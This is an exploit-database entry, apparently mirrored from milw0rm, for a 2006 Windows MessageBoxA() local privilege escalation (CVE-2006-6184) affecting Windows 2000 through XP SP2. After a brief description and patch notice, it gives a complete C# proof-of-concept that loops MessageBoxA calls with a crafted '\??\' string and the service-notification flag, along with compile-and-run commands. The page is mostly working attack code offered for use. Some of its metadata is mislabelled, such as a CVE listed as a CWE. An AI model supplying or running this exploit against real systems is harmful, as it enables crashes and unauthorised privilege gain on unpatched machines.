header-logo
Suggest Exploit
vendor:
Windows
by:
milw0rm.com
7,2
CVSS
HIGH
Local Privilege Escalation
264
CWE
Product Name: Windows
Affected Version From: Microsoft Windows 2000
Affected Version To: Microsoft Windows XP SP2
Patch Exists: YES
Related CWE: CVE-2006-6184
CPE: o:microsoft:windows
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2006

Microsoft Windows MessageBoxA() Local Privilege Escalation Vulnerability

A vulnerability exists in Microsoft Windows MessageBoxA() function which allows a local user to gain elevated privileges. This vulnerability is caused due to an error in the MessageBoxA() function when handling certain parameters. By exploiting this vulnerability, a local user can gain elevated privileges on the system.

Mitigation:

Microsoft has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
 [DllImport("user32.dll")]
 unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

 static unsafe void Main()
 {
   byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
   uint MB_SERVICE_NOTIFICATION = 0x00200000u;
   fixed(byte* pHelloBug = &helloBug[0])
   {
     for(int i=0; i<10; i++)
       MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
   }
 }
}
// >> csc /unsafe mbox.cs
// >> mbox.exe

// milw0rm.com [2006-12-20]

Navigation

Suggest Exploit

Services By CQR